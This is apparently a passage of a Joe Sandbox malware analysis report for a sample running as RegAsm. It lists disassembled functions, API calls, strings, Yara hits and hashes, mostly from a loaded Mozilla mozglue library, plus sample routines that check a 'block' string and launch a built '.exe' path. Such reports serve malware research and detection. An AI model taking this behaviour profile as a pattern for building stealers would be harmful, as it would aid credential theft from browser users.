Part of subcall function 6C2A31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2A32AB
Part of subcall function 6C2A31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2A32D1
Part of subcall function 6C2A31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C2A32E5
Part of subcall function 6C2A31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C2A32F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C2B9675
__Init_thread_footer.LIBCMT ref: 6C2B9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C2B96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C2B9707
__Init_thread_footer.LIBCMT ref: 6C2B971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C2B9773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C2B97B7
FreeLibrary.KERNEL32 ref: 6C2B97D0
FreeLibrary.KERNEL32 ref: 6C2B97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C2B9824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C2B9670
ntdll.dll, xrefs: 6C2B96E3
NtMapViewOfSection, xrefs: 6C2B9701
MapViewOfFileNuma2, xrefs: 6C2B97B1

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 00caac5c1643f71a11de9ad8f8dc779662e8ce2b2acc2f09253d64b24f924fa3
Instruction ID: fdeb702e63672df6ee9b9bc8a1915bcbd3875ca8bad5a26fbd1c840600aa904e
Opcode Fuzzy Hash: 00caac5c1643f71a11de9ad8f8dc779662e8ce2b2acc2f09253d64b24f924fa3
Instruction Fuzzy Hash: 9061D3B160021A9BDF00AF68D884F9A7BB8EB5E799F00412DFD55A7740D738A854CB91

Function 004117A0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 004117C5
ExitProcess.KERNEL32 ref: 004117D1
strtok_s.MSVCRT ref: 004117E8

Strings

block, xrefs: 004117B7

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 04f02f922f7740013fe83ed2a8f854d15328f230cbde421a22dc870209397cee
Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
Opcode Fuzzy Hash: 04f02f922f7740013fe83ed2a8f854d15328f230cbde421a22dc870209397cee
Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

Function 6C2A3AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C32E768,?,00003000,00000004), ref: 6C2A3AC5
LeaveCriticalSection.KERNEL32(6C32E768,?,00003000,00000004), ref: 6C2A3AE5
VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6C2A3AFB
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C2A3B57
EnterCriticalSection.KERNEL32(6C32E784), ref: 6C2A3B81
LeaveCriticalSection.KERNEL32(6C32E784), ref: 6C2A3BA3
EnterCriticalSection.KERNEL32(6C32E7B8), ref: 6C2A3BAE
LeaveCriticalSection.KERNEL32(6C32E7B8), ref: 6C2A3C74
EnterCriticalSection.KERNEL32(6C32E784), ref: 6C2A3C8B
LeaveCriticalSection.KERNEL32(6C32E784), ref: 6C2A3C9F
LeaveCriticalSection.KERNEL32(6C32E7B8), ref: 6C2A3D5C
EnterCriticalSection.KERNEL32(6C32E784), ref: 6C2A3D67
LeaveCriticalSection.KERNEL32(6C32E784), ref: 6C2A3D8A

Part of subcall function 6C2E0D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C2A3DEF), ref: 6C2E0D71
Part of subcall function 6C2E0D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C2A3DEF), ref: 6C2E0D84

Strings

<jemalloc>, xrefs: 6C2A3DC7
MOZ_CRASH(), xrefs: 6C2A3DB2
: (malloc) Error in VirtualFree(), xrefs: 6C2A3DCC

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
API String ID: 2380290044-2272602182
Opcode ID: ff3086723874beb5cc26ff11bed346f21160a8060ba5f1e7b1d462169f41f63e
Instruction ID: c5cba5779c194d52adc6cd1599a4fb60ebc9cd1380323a23fad9e635f17a9da2
Opcode Fuzzy Hash: ff3086723874beb5cc26ff11bed346f21160a8060ba5f1e7b1d462169f41f63e
Instruction Fuzzy Hash: 589190757003098BDF04CFBCC881B6A77B6FB86315B244529ED529BB85D779D802CB91

Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

memset.MSVCRT ref: 00410C1C
lstrcatA.KERNEL32(?,00000000), ref: 00410C35
lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
lstrcatA.KERNEL32(?,00000000), ref: 00410C88
lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
lstrlenA.KERNEL32(?), ref: 00410CA7
memset.MSVCRT ref: 00410CCD
memset.MSVCRT ref: 00410CE1

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0133AAB8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,01341B00,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66

Strings

.exe, xrefs: 00410A95

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlenmemset$CreateObjectProcessSingleSystemTimeWait
String ID: .exe
API String ID: 3577131086-4119554291
Opcode ID: 6364e5e739fe9739766a1ce8d8c7e5a183e8e2bdcb2e6e6671a0d6d634042010
Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
Opcode Fuzzy Hash: 6364e5e739fe9739766a1ce8d8c7e5a183e8e2bdcb2e6e6671a0d6d634042010
Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E

Function 6C2B11B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C2B1213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C2B1285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C2B12B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C2B1327

Strings

MZx, xrefs: 6C2B11E1
&, xrefs: 6C2B126B
CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C2B131B
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C2B120D
TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C2B12AD

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: f5bbf8f7b9fe2098e36b115948f53ed21e22ff674795f3c53440f66bfb95fae3
Instruction ID: 99f081307c627e6466c8034823b7db1cdb5b86d9a4328e4b6afb78c65be9129e
Opcode Fuzzy Hash: f5bbf8f7b9fe2098e36b115948f53ed21e22ff674795f3c53440f66bfb95fae3
Instruction Fuzzy Hash: 4071A071A053598ADB109F64C8047DEB7F5BF4538DF04066ED845B3B40EB74AAC8CBA2

Function 6C2A31C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C2A3217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C2A3236
FreeLibrary.KERNEL32 ref: 6C2A324B
__Init_thread_footer.LIBCMT ref: 6C2A3260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C2A327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2A328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2A32AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2A32D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C2A32E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C2A32F7

Part of subcall function 6C2DAB89: EnterCriticalSection.KERNEL32(6C32E370,?,?,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB94
Part of subcall function 6C2DAB89: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DABD1

__aulldiv.LIBCMT ref: 6C2A346B

Strings

QueryInterruptTime, xrefs: 6C2A3230
KernelBase.dll, xrefs: 6C2A3212

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: 00892fa9f0d6ef1a22d4d2f5d42435bfbe27997cdfb086df5f49114129b11d70
Instruction ID: 39bc59b7729d7b87cba7dcd2b0ff60d64a9e55382c78afe39e64d0cc501b0da8
Opcode Fuzzy Hash: 00892fa9f0d6ef1a22d4d2f5d42435bfbe27997cdfb086df5f49114129b11d70
Instruction Fuzzy Hash: FD61F271A087458FCB11CF78C45165AB3F9FF8A354F218B1DF8A6A3690DB34D54A8B42

Function 6C306660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C32F618), ref: 6C306694
GetThreadId.KERNEL32(?), ref: 6C3066B1
GetCurrentThreadId.KERNEL32 ref: 6C3066B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C3066E1
EnterCriticalSection.KERNEL32(6C32F618), ref: 6C306734
GetCurrentProcess.KERNEL32 ref: 6C30673A
LeaveCriticalSection.KERNEL32(6C32F618), ref: 6C30676C
GetCurrentThread.KERNEL32 ref: 6C3067FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C306868
RtlCaptureContext.NTDLL ref: 6C30687F

Strings

WalkStack64, xrefs: 6C306890

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 13796324178ab1e27b499d7802469d4f19a47cce11e7febb994ef27f67fe6a3f
Instruction ID: e187d0609d7569ad46c130197e0b36c8e5d9954ac47028128f449a60be805b53
Opcode Fuzzy Hash: 13796324178ab1e27b499d7802469d4f19a47cce11e7febb994ef27f67fe6a3f
Instruction Fuzzy Hash: 66518D72A09301AFDB11CF24C844B9ABBF8FF89B18F00492DF99997640D775E9448F92

Function 6C2EDE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C2B4A68), ref: 6C2E945E
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2E9470
Part of subcall function 6C2E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2E9482
Part of subcall function 6C2E9420: __Init_thread_footer.LIBCMT ref: 6C2E949F

GetCurrentThreadId.KERNEL32 ref: 6C2EDE73
GetCurrentThreadId.KERNEL32 ref: 6C2EDF7D
AcquireSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EDF8A
ReleaseSRWLockExclusive.KERNEL32(6C32F4B8), ref: 6C2EDFC9
GetCurrentThreadId.KERNEL32 ref: 6C2EDFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2EE000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C2B4A68), ref: 6C2EDE7B

Part of subcall function 6C2E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2E94EE
Part of subcall function 6C2E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2E9508

Part of subcall function 6C2DCBE8: GetCurrentProcess.KERNEL32(?,6C2A31A7), ref: 6C2DCBF1
Part of subcall function 6C2DCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2A31A7), ref: 6C2DCBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C2B4A68), ref: 6C2EDEB8
free.MOZGLUE(00000000,?,6C2B4A68), ref: 6C2EDEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C2EDF38

Strings

<none>, xrefs: 6C2EDFD7
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C2EE00E
[I %d/%d] locked_profiler_stop, xrefs: 6C2EDE83

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: 34dc43dbaf9a7dbe57cd00e7485259945c9f41ca5561e1aeb8c74981549191a8
Instruction ID: 6377d534d213a7d6da3e7e8d814c9d3de6ce5c93ea9e40c0dc42309e40e1f2e2
Opcode Fuzzy Hash: 34dc43dbaf9a7dbe57cd00e7485259945c9f41ca5561e1aeb8c74981549191a8
Instruction Fuzzy Hash: 17412A71B011199BDF109F64D8087AA7779EF8E31DF84001DED05ABB01CBB9A805CBE2

Function 6C2FD840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2FD85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FD86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2FD918
GetCurrentThreadId.KERNEL32 ref: 6C2FD93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FD948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2FD970
GetCurrentThreadId.KERNEL32 ref: 6C2FD976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FD982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2FD9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C2FDA2E
GetCurrentThreadId.KERNEL32 ref: 6C2FDA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FDA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C2FDA91

Part of subcall function 6C2C5C50: GetTickCount64.KERNEL32 ref: 6C2C5D40
Part of subcall function 6C2C5C50: EnterCriticalSection.KERNEL32(6C32F688), ref: 6C2C5D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2FDAB7

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: a79fc4a3f14f9833e96cc1a60f1bcdadfda0fd0e58434a9599d339e7423aeeb0
Instruction ID: 4c09a411ace8550ac52ef58dcb5526c935b892adc241666cd1404422c0b56fe9
Opcode Fuzzy Hash: a79fc4a3f14f9833e96cc1a60f1bcdadfda0fd0e58434a9599d339e7423aeeb0
Instruction Fuzzy Hash: 22718D75604308DFCB00DF29C888B9ABBB9FF89314F15866DEC5A9B341DB34A945CB91

Function 6C2FD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2FD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2FD52A
GetCurrentThreadId.KERNEL32 ref: 6C2FD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2FD55F
free.MOZGLUE(00000000), ref: 6C2FD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C2FD5D3
GetCurrentThreadId.KERNEL32 ref: 6C2FD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2FD652
GetCurrentThreadId.KERNEL32 ref: 6C2FD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C2FD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2FD6A2

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 0e1da9d5db2846de5ba2eb0a955f9d42d4ec7fa4990c3019ef48019308eaf6b5
Instruction ID: 957a15ba2d34b36348e943befe75315bf46324bc0c749fb2bca3360aa09bc1ec
Opcode Fuzzy Hash: 0e1da9d5db2846de5ba2eb0a955f9d42d4ec7fa4990c3019ef48019308eaf6b5
Instruction Fuzzy Hash: 9C514B71A04709DFCB04DF35C484A9AFBB8FF89358F108A2EE95A87711DB34A945CB91

Function 004112D0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411307
strtok_s.MSVCRT ref: 00411750

